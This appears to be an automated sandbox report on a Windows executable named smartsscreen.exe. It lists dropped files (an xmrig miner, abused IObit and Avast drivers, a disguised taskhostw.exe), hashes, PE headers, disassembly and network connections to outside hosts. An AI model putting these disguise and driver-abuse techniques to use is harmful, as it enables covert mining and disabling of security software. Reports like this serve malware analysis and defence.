SHA-512:	AA315B61191F7548C95252AA37C38DDC38BFC8BF57F2774B61E87CBDB78B13D3A68611F3A5A9B8F0D33AA477D8DFDF0DF4B5B45214B5649A8489B3C35723BA9B
Malicious:	false
Preview:	MSCF............,...................E........\|.........P.c .curl.exe..v_..A..CK.}}x.E...f...f....F.5H.._....!.D....%hT.......5jpw..a1......P...S...MH...C...[v..A .....gv6.......y.................1. .._8,........_)..u..^..n.]Si.......4c.S....I.=.?=.Nz...?%=..q.&=.......].8.]..g.!./......z...X...c.... \.i..p...XF..[...N?.9.....+.K..X^......3...]..]..>...D#...o..LX.UH.D.ToW......./v..t.XF......P./.2...#.R.mG...Q.2..!3Y.u.....o.g.N.2.<>..i.;...L...u./5s..f.......F.C...z..38..K.{..#^......N.....g.....K...:/..]4.........f....T..c.q..=^..d...>.2...).......T......_w#>.M.iU....}0.[yO...@.j.m..V......s....-W....$...1...../..6A..r,K)..R....Aq./_e..#.S]...dZ..6Q'.Jc..r..Z=.L.....A.Pw...o.R.......aq...VQ..T...:J\|y.\|..i...y...J..)...Q.%.O.l.X..g.P ..(AV`3...)..M)K..6..$..OO{<{.......c.....J......+,s...6.._a...*...8...?.{....S+V.......k.Y.U.}...[..d.....q..`.x.H`.D\|x.5.>..G..E]..N..#O{s.P......J.....C.6..Y.w..B,..yi...5z[-...:......,.k.g2@..0\|../..K

C:\Users\user\Desktop\taskhostw.exe (copy)

Download File

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5617152
Entropy (8bit):	6.635483682863182
Encrypted:	false
SSDEEP:	98304:uanQao4MuADrkyzh9eWQxIWE2Fd2FzJMAAT6Pa7zR4azwxA9tZLtQ:eao4MId2FzJMA3a7zGXAZLtQ
MD5:	BD877072C51EE58EC7AAF091BFF0B80C
SHA1:	41FCE204948DF6AF1FE2F3F6DEC02086678EAB3B
SHA-256:	35EB368C14AD25E3B1C58579EBAEAE71BDD8EF7F9CCECFC00474AA066B32A03F
SHA-512:	27E90612A735F1296DD3A80B7538A780B8A2D30A2F63782E90DDA1A12CA070D701C077719C50DED4FDBE68AF511F5767015EFE1137620B955E0ACE2AB397F655
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......D...............e......e.......e.....R......R......R..&...e.............e..........e......4......&............].......5............Rich....................PE..d.....e.........."......T9..VF.....T.4........@..........................................`...................................................Q...............\|..............`......`.M.......................M.(.....M..............p9.(............................text....R9......T9................. ..`.rdata...]...p9..^...X9.............@..@.data.....+...Q.......Q.............@....pdata........\|.......R.............@..@_RANDOMXV.............T.............@..`_TEXT_CN.&.......(....T.............@..`_TEXT_CN.....@........U.............@..`.reloc.......`........U.............@..B........................................................................................................................

C:\Users\user\Desktop\taskhostw.png

Download File

Process:	C:\Users\user\Desktop\curl.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 2432673 bytes, 1 file, at 0x2c +A "xmrig.exe", number 1, 172 datablocks, 0x1 compression
Category:	modified
Size (bytes):	2432673
Entropy (8bit):	7.995669266424712
Encrypted:	true
SSDEEP:	49152:8hGCu4MAEu6KyoeoxcCTQtZ7ZlmJzrq1YxroeN8AGrO0VjGG:+MAEuPeWcSQVlIrq1YXN8r9Vb
MD5:	DC6CD17105168171C27FB167239636E1
SHA1:	5CFC86DD2CA119F056E5561DDDF36A1A8AA3C32E
SHA-256:	C5795C4AE2CC1CE89BF8421241BC9E7E926E38E065EB1BBB7A7771FBB78D3CC1
SHA-512:	A784B051F96BFAA5D830F9EFEB0D5B5A071B251FA0852975BD4C3C5439B6661E28D0DC79AA298D93905603641B8497BBB2124D590F820DDB9823B7979C9C7F9B
Malicious:	false
Preview:	MSCF......%.....,...................F.........U.......8XH. .xmrig.exe.%...7?..CK..}\T..7/[@.gx.<J.JF.......sc.....6.(.....1..i>.[....C."{....{.$...$;..H.6bE.Eu..>.y.........q......z.zy.....R...!..uu..C.?I......a@......C.~.f.\o.(\..p..s.k........W.5...2.Y.,/.`...5R?:.......;.....u...y.@(3.=u!X.\....F..Ku.......0..W..Z..yo.uT...:...n....S...9.?.......u..\....t...a.c....o..C.&...`..'...!..<V.L4.~.]..B.....V.t......Fz.{.u)..u.....Y....n...Cqx.0...+=2K.g%..~............"(....!...6f.6.p..%..h...Ci..e.kLJ 3.i.%.Ms.!..yoNw;gB...3...P~...P...Rg.<.....P\..ng}([.d?4...G...;6.7nm.=.....r.\......r..s6...6X>v.~....Sl.s.{....m.$.TEM.K.......T.....62SP.....$..0.G...O.BEEj.k.!.!......#3.#......JnW.....4.w.re>..D#.J..K..sDjT...ZU.q..s..ZN.Q...!..H..,#.FDS.\R6..Ta....<@$X.M....3.hU.U>...d...I.~HJ.&E..\|.y........>...[...#.\|U...C.q.M.Z^.,...p..ly...!4....W...S..... ......E......E...>W..`.oF.k'\|..2..SD.X....9E.0...>...r.r.......G.v...m.=~.`...1g

C:\Windows\Logs\DPX\setupact.log

Download File

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	349646
Entropy (8bit):	4.387247989942898
Encrypted:	false
SSDEEP:	192:0K9KmK9KIK7KIK7KYK7KIK7KYK7KIK7KYK7KIK7KYK7KIK7KYK7KIK7KYK7KIK7X:w
MD5:	CA9073B1ACBC0336FE313F9EC56CD3E5
SHA1:	E779C0CD2F7931BD9B21705901783015ED39BDC3
SHA-256:	BFF8F336B7FBB30A2EB4F9E5CF8808B9581DE614962C849C8E0E15F66C7D9228
SHA-512:	F2FB3F6E57CC1988CD81BB764AD3B5D9C8AA5A04ED6DD380F57C88B10BB5C068971CAFBA9524278C3C31326D35D7260BFF1127464D13D223151B177A9B0CA11D
Malicious:	false
Preview:	.2023-10-03 11:48:47, Info DPX Started DPX phase: Resume and Download Job..2023-10-03 11:48:47, Info DPX Started DPX phase: Apply Deltas Provided In File..2023-10-03 11:48:47, Info DPX Ended DPX phase: Apply Deltas Provided In File..2023-10-03 11:48:47, Info DPX Started DPX phase: Apply Deltas Provided In File..2023-10-03 11:48:47, Info DPX Ended DPX phase: Apply Deltas Provided In File..2023-10-03 11:48:47, Info DPX CJob::Resume completed with status: 0x0..2023-10-03 11:48:47, Info DPX Ended DPX phase: Resume and Download Job..2023-10-03 11:48:49, Info DPX Started DPX phase: Resume and Download Job..2023-10-03 11:48:49, Info DPX Started DPX phase: Apply Deltas Provided In File..2023-10-03 11:48:49, Info DPX Ended DPX phase: Apply Deltas Provided In File..2023-10-03 11:48:49, Info

C:\Windows\System32\drivers\72f5dad3d3e346df92d05eb16b52df1c$dpx$.tmp\0bfdc61464f46f4e9af5455e9b3ded61.tmp

Download File

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	208024
Entropy (8bit):	6.632244342820137
Encrypted:	false
SSDEEP:	3072:xz+NqbN1bKSAyU3+/3lV+V/VbCO2g8OPC3CuXBHmY6Nl6Y31DZkEL:ZZ8SNNQbCOD8X3CgmH6Y31lkEL
MD5:	A179C4093D05A3E1EE73F6FF07F994AA
SHA1:	5D6B9E80E12BFC595D4D26F6AFB099B3CB471DD4
SHA-256:	4B5229B3250C8C08B98CB710D6C056144271DE099A57AE09F5D2097FC41BD4F1
SHA-512:	788682500C548FA55A3AC6B0BC3F9FE77C2D1695F7BCE808269B4AA2842450295C87981669ECE74F8591E1B51045E4071D0CA61362EB3A02BD6AD2041F9A8918
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............c...c...c..b...c...b.p.c..e...c..`...c..g...c.{.`...c.{.k...c.{.....c.{.a...c.Rich..c.........PE..d......`.........."......\........... .........@.............................`............`A................................................. ..(....@...................l...P.......U..T............................V...............@..8............................text....(.......*.................. ..h.rdata...;...@...<..................@..H.data....Z...........j..............@....pdata...............t..............@..HPAGE....K........................... ..`INIT......... ...................... ..b.rsrc........@......................@..B.reloc.......P......................@..B........................................................................................................................................................................................

C:\Windows\System32\drivers\IObitUnlockers.png

Download File

Process:	C:\Users\user\Desktop\curl.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 18994 bytes, 1 file, at 0x2c +RA "IObitUnlocker.sys", number 1, 2 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	18994
Entropy (8bit):	7.985469808507536
Encrypted:	false
SSDEEP:	384:Ul/zIa4gkcBiLp9ChfQ/tQ3pXTxBsSZY/ezmyxFgJ8+QBBw8pxRna:Up/3i19MI/q51az/e9FgJgBHx0
MD5:	AA8FFE5D6495AFB8515E1B7C27A7A4AC
SHA1:	EE01A179597C5580923864F39040E4CBA6A6659F
SHA-256:	1CA472A087279A36EC239C953AD249D358D7B6B7A0941FDCDB9F02518F320D0F
SHA-512:	E3DDF29B26E3D41F88A72778A2CAAC6AB5D883E61552C4E136774E6103E2EBF6023431A1DF0358BBC07F999B0D0B0FF2DDD2ADFA5B41A19DC4FFAC91687E0322
Malicious:	false
Preview:	MSCF....2J......,...................N................>C.x!.IObitUnlocker.sys..L...@..CK..@S.(.3.ar#....RQ...[.$..A.p8. $BE.dG@..Ak.M.m=...`g....S.(.X'...Z[k. ...Ck....v.......w......y}.Zk..Y....0r..n....O:..V.z.....\|t.v........Z..Z.XUXPVV...UV{...L....Z\^dN...Q.}...........<.R>...I......H.->.o.!i.IsJ......l.....b^.1.x.:..L.4.af.C$.+.._.x'..x/e.@x.\..B.t Q"..}..o"\|..e.a.8.y.a.......0.@...6...0L.?A{.....8.7W........Q1Lq..../`....O@.a.w..2.%.jL......sC...Z..^.s...'.....!/.p-.....V....i....]7...`5..CE"_."\|e7..wH....9....F...$......I8..4...zv.N... .k,.4I.....XX.....i...0..Mk.....p.0[a`.5.O...l..Fh..L..a...p.=.'..Os...APQ....F.!.x.<.s.k..'..{...4~..8.. .+Y.>..E.....[....x>&.c.c...E...H....lN>..?J.<...Z.zu.s\|T......pr.....-..wbV.s\|:.9Pt...3:3c ...W.9x....dZ..;.4t..9.I..V.!.B.(NX.F.p+7C^.XQ.'YX7..hRC...{r... ......p{...{...h.......=......).....j......00w0...HW...i..i:<1s.\....[........F.s.....a.l1F...>...E5..$X\|...p@..tq..0...t.8..Xq

C:\Windows\System32\drivers\aswArPots.png

Download File

Process:	C:\Users\user\Desktop\curl.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 114419 bytes, 1 file, at 0x2c +A "aswArPot.sys", number 1, 7 datablocks, 0x1 compression
Category:	modified
Size (bytes):	114419
Entropy (8bit):	7.996237943820945
Encrypted:	true
SSDEEP:	3072:zpF3owGv4E6Mkqca4B/blS0GV7cU5Zaazw:zpFwv4IrKBh4Taazw
MD5:	851284B85ACA7D8E966F3F0DCF9AA33B
SHA1:	916747A0C17C3E5BA931B259153FF67C071B991E
SHA-256:	FDCA346264DB6C2C112F3661B7A41314EC048FC08E97EF1842E298F361ECEDE6
SHA-512:	4435796DBF945B6331FF281146D1785FF7258F95B97E56F463A29F43EFFAC74B5E0A31889DA315C9B258890083832DBBD0ED58A7245C1AFAE2EDAD85139CCC63
Malicious:	false
Preview:	MSCF...........,...................I........,........1X9y .aswArPot.sys..G.J)M..CK.y\|SU......r.4R..@.j.+.mM.riBO...@.H....b...JkZ$.......:.3:....J.dG.E....U.-...y.s...........$..<.9.y.s...Q..`0X.O...:...m.....7pd.@..v..3.w...xIE......zG.[..`......L[rg..pf..w.p\|rr.....&.4.^p(...._.n..:.....~.>K.7...;.s..R.s.........y.a...d.b./.k..`.m..p.!.....h....K.sM...M.0.j0...../~.W.../.`..J...gN...T.5.}.....Q.'.F..6.....R/....a.2..jx..z..d.....>.d..{..M.l.?>.pU.>....@W...../.`X<...[.....s.>........./......uD.~^....EE.#.......+....`........M?...7.Gh.h..f............;..-..P..S./\v.TD.#.q..[.........E.N[....../e.V.i.e9)r..m..L..e9..)..i...D.].k4.j..+..TY........j....2O.-h..&oU..4..4..)...~'...wX.$..q..H..E..x..y.\,..@gi.o...F....b1..T;...T=..k:..Y.%.. k....u.p.<5...P.ko._..iJh.G..r....L.i..._c2.4.o@........\.ER.?...\..K.)8F$.=.>.\|..UZ.....E.Tk.+.w_.J.1.E...c..?`.b<,.c._#...K.h.oaZ+S..i.[2M.DOy.....?!..24......dy..2...}..=.w`...O...^.5.G.N.v...8...7b.Zd

C:\Windows\System32\drivers\bb7302fc42eb479faf23a8d79ab6c5b2$dpx$.tmp\a9588d84e77073409fe455d00c8a6901.tmp

Download File

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36568
Entropy (8bit):	6.360292192643284
Encrypted:	false
SSDEEP:	768:eWspdre2ANTcdAbIheysJAzCbACWUKpS5eX3k5Jj:P2OICJJ/gS5eHkb
MD5:	D7B749051DA5FB4604F4141F19C47660
SHA1:	288DAEFD1CE65FB01011DC8A64491111207D3965
SHA-256:	2B33DF9AFF7CB99A782B252E8EB65CA49874A112986A1C49CD9971210597A8AE
SHA-512:	1D0AC1854EB6F2A5D2D90424BC5B9DD989AD61A2F3E87D6E9CA97A7F5F7C0D38B387CFD3E16B14992EA263B5D4194B0D38B8B8A6F5B1D0829A6932FDE127C193
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......97..}V..}V..}V..}V..KV..t...~V..t...~V..t...xV..t...~V..t...\|V..t...\|V..Rich}V..........PE..d....RER.........."......Z..........d................................................1..........................................................(.......p.......L....p...............q...............................................p...............................text....Q.......R.................. ..h.rdata.......p.......V..............@..H.data...p............\..............@....pdata..L............^..............@..HINIT....L............b.............. ....rsrc...p............j..............@..B.reloc..$............n..............@..B................................................................................................................................................................................................................................................

C:\Windows\system32\drivers\IObitUnlockers.sys (copy)

Download File

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36568
Entropy (8bit):	6.360292192643284
Encrypted:	false
SSDEEP:	768:eWspdre2ANTcdAbIheysJAzCbACWUKpS5eX3k5Jj:P2OICJJ/gS5eHkb
MD5:	D7B749051DA5FB4604F4141F19C47660
SHA1:	288DAEFD1CE65FB01011DC8A64491111207D3965
SHA-256:	2B33DF9AFF7CB99A782B252E8EB65CA49874A112986A1C49CD9971210597A8AE
SHA-512:	1D0AC1854EB6F2A5D2D90424BC5B9DD989AD61A2F3E87D6E9CA97A7F5F7C0D38B387CFD3E16B14992EA263B5D4194B0D38B8B8A6F5B1D0829A6932FDE127C193
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......97..}V..}V..}V..}V..KV..t...~V..t...~V..t...xV..t...~V..t...\|V..t...\|V..Rich}V..........PE..d....RER.........."......Z..........d................................................1..........................................................(.......p.......L....p...............q...............................................p...............................text....Q.......R.................. ..h.rdata.......p.......V..............@..H.data...p............\..............@....pdata..L............^..............@..HINIT....L............b.............. ....rsrc...p............j..............@..B.reloc..$............n..............@..B................................................................................................................................................................................................................................................

C:\Windows\system32\drivers\aswArPots.sys (copy)

Download File

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	208024
Entropy (8bit):	6.632244342820137
Encrypted:	false
SSDEEP:	3072:xz+NqbN1bKSAyU3+/3lV+V/VbCO2g8OPC3CuXBHmY6Nl6Y31DZkEL:ZZ8SNNQbCOD8X3CgmH6Y31lkEL
MD5:	A179C4093D05A3E1EE73F6FF07F994AA
SHA1:	5D6B9E80E12BFC595D4D26F6AFB099B3CB471DD4
SHA-256:	4B5229B3250C8C08B98CB710D6C056144271DE099A57AE09F5D2097FC41BD4F1
SHA-512:	788682500C548FA55A3AC6B0BC3F9FE77C2D1695F7BCE808269B4AA2842450295C87981669ECE74F8591E1B51045E4071D0CA61362EB3A02BD6AD2041F9A8918
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............c...c...c..b...c...b.p.c..e...c..`...c..g...c.{.`...c.{.k...c.{.....c.{.a...c.Rich..c.........PE..d......`.........."......\........... .........@.............................`............`A................................................. ..(....@...................l...P.......U..T............................V...............@..8............................text....(.......*.................. ..h.rdata...;...@...<..................@..H.data....Z...........j..............@....pdata...............t..............@..HPAGE....K........................... ..`INIT......... ...................... ..b.rsrc........@......................@..B.reloc.......P......................@..B........................................................................................................................................................................................

\Device\Mup\user-PC\PIPE\samr

Download File

Process:	C:\Users\user\Desktop\smartsscreen.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.053374040827532
Encrypted:	false
SSDEEP:	3:rmHD/tH//lllLGlA1yqGlgZty:rmH2oty
MD5:	080E701E8B8E2E9C68203C150AC7C6B7
SHA1:	4EF041621388B805758AE1D3B122F9D364705223
SHA-256:	FE129AE2A7C96708754F6F51091E6E512C9FEACA1042A1E9DB914C651FEB344D
SHA-512:	C11D88B8E355B7B922B985802464B693F75BA4C2A62F9137A15842CA82F9B6B3ED13059EDC0DF1C04E7DE43719D892B4C0D22BB67BE0D57EAB368BA1BC057E79
Malicious:	false
Preview:	........t.......................xW4.4.....#Eg.......]..........+.H`........xW4.4.....#Eg......,..l..@E............

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\sc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	87
Entropy (8bit):	4.616923406705222
Encrypted:	false
SSDEEP:	3:OEAAKzgaUf78FBeDTRtxyUCcvy:O5Dz3FQDTR3ywvy
MD5:	EEA46E8CD845DCC38DA24D0826E146D0
SHA1:	3CC351A79A3871D76939721250116E32DC2CD9FB
SHA-256:	7EA1DEAA69BF67A9B632209A1F2A187C13FF7D514A48BDA3436A93AFC5F5C7B1
SHA-512:	C10F752812B37EAF1534DAD97D96F462347DFBA615932174CAFA972FA0D95967C7B25A12F1D40D0F37BCC4B622C93BBC284DBB9F689BB9D6B7577ADB780C3EB9
Malicious:	false
Preview:	[SC] StartService FAILED 31:....A device attached to the system is not functioning.....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.241919296285991
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	smartsscreen.exe
File size:	4'378'624 bytes
MD5:	18957d83337a7f6a879d739be02b173e
SHA1:	125982676af23e93fa58b31ef1bdb93725cb91c3
SHA256:	2fe78941d74d35f721556697491a438bf3573094d7ac091b42e4f59ecbd25753
SHA512:	47e9029e8def90a17884423e3caa98a4f99f7e08397074c6a49b7130a464b9bd6406dbf3dac75f48483cc80cc155f6f2a47bdd58a5084230163ca16d1d8c77f9
SSDEEP:	49152:hW+hyKmPHUmK+aSsPN+3slhZOfVQSw2CYOgCpDqgQrfQ7guqoUlMXc:1yK/m+SsPNKkUqQOHTXc
TLSH:	3D164A90EDEB14F2EA035A301897533F673026068739DEC7DA541F56F927BE10A33A66
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........B...............>..>......`.........>...@..........................pD............................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x44d160
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	96c44fa1eee2c4e9b9e77d7bf42d59e6

Entrypoint Preview

Instruction
jmp 00007F19A47A4ED0h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ebx, dword ptr [esp+04h]
mov dword ptr fs:[00000034h], 00000000h
mov ebp, esp
mov ecx, dword ptr [ebx+04h]
mov eax, ecx
shl eax, 02h
sub esp, eax
mov edi, esp
mov esi, dword ptr [ebx+08h]
cld
rep movsd
call dword ptr [ebx]
mov esp, ebp
mov ebx, dword ptr [esp+04h]
mov dword ptr [ebx+0Ch], eax
mov dword ptr [ebx+10h], edx
mov eax, dword ptr fs:[00000034h]
mov dword ptr [ebx+14h], eax
ret
int3
int3
int3
int3
sub esp, 18h
mov dword ptr [esp], FFFFFFF4h
mov ebp, esp
call dword ptr [007EA050h]
mov esp, ebp
mov dword ptr [esp], eax
mov edx, 008412A0h
mov dword ptr [esp+04h], edx
mov edx, dword ptr [00840F14h]
mov dword ptr [esp+08h], edx
lea edx, dword ptr [esp+14h]
mov dword ptr [edx], 00000000h
mov dword ptr [esp+0Ch], edx
mov dword ptr [esp+10h], 00000000h
call dword ptr [007EA014h]
mov esi, ebp
add esp, 18h
ret
int3
int3
int3
int3
mov eax, dword ptr fs:[00000034h]
mov dword ptr [esp+04h], eax
ret
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
sub esp, 28h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+10h], ebp
mov dword ptr [esp+14h], esi
mov dword ptr [esp+18h], edi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x445000	0x372	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3ea000	0x8c	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3e86b5	0x3e8800	17ed593f4c84fcff237e407c43052b28	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x3ea000	0x5a168	0x43e00	e85407c9e158876bd888834688312ebc	False	0.56935572053407	data	6.466802460231356	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x445000	0x372	0x400	d316a8156283a2185f95bb3b29a39155	False	0.4755859375	data	4.276154001056745	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.symtab	0x446000	0x4	0x200	07b5472d347d42780469fb2654b7fc54	False	0.02734375	data	0.020393135236084953	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
winmm.dll	timeEndPeriod, timeBeginPeriod
ws2_32.dll	WSAGetOverlappedResult
kernel32.dll	WriteFile, WriteConsoleW, WaitForSingleObject, VirtualFree, VirtualAlloc, SwitchToThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, LoadLibraryA, LoadLibraryW, GetSystemInfo, GetStdHandle, GetQueuedCompletionStatus, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 29, 2024 14:25:04.416398048 CEST	49675	443	192.168.2.4	173.222.162.32
May 29, 2024 14:25:12.393590927 CEST	49742	443	192.168.2.4	1.1.1.1
May 29, 2024 14:25:12.393625975 CEST	443	49742	1.1.1.1	192.168.2.4
May 29, 2024 14:25:12.393769026 CEST	49742	443	192.168.2.4	1.1.1.1
May 29, 2024 14:25:12.395764112 CEST	49742	443	192.168.2.4	1.1.1.1
May 29, 2024 14:25:12.395785093 CEST	443	49742	1.1.1.1	192.168.2.4
May 29, 2024 14:25:13.899415970 CEST	443	49742	1.1.1.1	192.168.2.4
May 29, 2024 14:25:13.899631977 CEST	49742	443	192.168.2.4	1.1.1.1
May 29, 2024 14:25:13.901412010 CEST	49742	443	192.168.2.4	1.1.1.1
May 29, 2024 14:25:13.901441097 CEST	443	49742	1.1.1.1	192.168.2.4
May 29, 2024 14:25:13.901766062 CEST	443	49742	1.1.1.1	192.168.2.4
May 29, 2024 14:25:13.901999950 CEST	49742	443	192.168.2.4	1.1.1.1
May 29, 2024 14:25:13.944535971 CEST	443	49742	1.1.1.1	192.168.2.4
May 29, 2024 14:25:14.184391022 CEST	443	49742	1.1.1.1	192.168.2.4
May 29, 2024 14:25:14.184458971 CEST	443	49742	1.1.1.1	192.168.2.4
May 29, 2024 14:25:14.184551954 CEST	49742	443	192.168.2.4	1.1.1.1
May 29, 2024 14:25:14.184942961 CEST	49742	443	192.168.2.4	1.1.1.1
May 29, 2024 14:25:14.184963942 CEST	443	49742	1.1.1.1	192.168.2.4
May 29, 2024 14:25:14.184993982 CEST	49742	443	192.168.2.4	1.1.1.1
May 29, 2024 14:25:14.184998989 CEST	443	49742	1.1.1.1	192.168.2.4
May 29, 2024 14:25:14.186043978 CEST	49743	443	192.168.2.4	1.1.1.1
May 29, 2024 14:25:14.186084986 CEST	443	49743	1.1.1.1	192.168.2.4
May 29, 2024 14:25:14.186161995 CEST	49743	443	192.168.2.4	1.1.1.1
May 29, 2024 14:25:14.186350107 CEST	49743	443	192.168.2.4	1.1.1.1
May 29, 2024 14:25:14.186364889 CEST	443	49743	1.1.1.1	192.168.2.4
May 29, 2024 14:25:14.666877031 CEST	443	49743	1.1.1.1	192.168.2.4
May 29, 2024 14:25:14.667090893 CEST	49743	443	192.168.2.4	1.1.1.1
May 29, 2024 14:25:14.668576956 CEST	49743	443	192.168.2.4	1.1.1.1
May 29, 2024 14:25:14.668589115 CEST	443	49743	1.1.1.1	192.168.2.4
May 29, 2024 14:25:14.668802977 CEST	443	49743	1.1.1.1	192.168.2.4
May 29, 2024 14:25:14.668999910 CEST	49743	443	192.168.2.4	1.1.1.1
May 29, 2024 14:25:14.712543964 CEST	443	49743	1.1.1.1	192.168.2.4
May 29, 2024 14:25:14.983791113 CEST	443	49743	1.1.1.1	192.168.2.4
May 29, 2024 14:25:14.983963966 CEST	443	49743	1.1.1.1	192.168.2.4
May 29, 2024 14:25:14.984054089 CEST	49743	443	192.168.2.4	1.1.1.1
May 29, 2024 14:25:14.984210014 CEST	49743	443	192.168.2.4	1.1.1.1
May 29, 2024 14:25:14.984230995 CEST	443	49743	1.1.1.1	192.168.2.4
May 29, 2024 14:25:14.984242916 CEST	49743	443	192.168.2.4	1.1.1.1
May 29, 2024 14:25:14.984249115 CEST	443	49743	1.1.1.1	192.168.2.4
May 29, 2024 14:25:14.984678984 CEST	49744	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:14.989660978 CEST	80	49744	111.90.158.40	192.168.2.4
May 29, 2024 14:25:14.989742041 CEST	49744	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:14.990796089 CEST	49744	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:14.995651007 CEST	80	49744	111.90.158.40	192.168.2.4
May 29, 2024 14:25:15.966005087 CEST	80	49744	111.90.158.40	192.168.2.4
May 29, 2024 14:25:15.966061115 CEST	80	49744	111.90.158.40	192.168.2.4
May 29, 2024 14:25:15.966114044 CEST	49744	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:15.966203928 CEST	49744	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:15.967776060 CEST	49745	443	192.168.2.4	111.90.158.40
May 29, 2024 14:25:15.967818975 CEST	443	49745	111.90.158.40	192.168.2.4
May 29, 2024 14:25:15.967880011 CEST	49745	443	192.168.2.4	111.90.158.40
May 29, 2024 14:25:15.968986988 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:15.971035004 CEST	80	49744	111.90.158.40	192.168.2.4
May 29, 2024 14:25:15.971250057 CEST	49747	21	192.168.2.4	93.95.225.137
May 29, 2024 14:25:15.973901033 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:15.973963022 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:15.974585056 CEST	49745	443	192.168.2.4	111.90.158.40
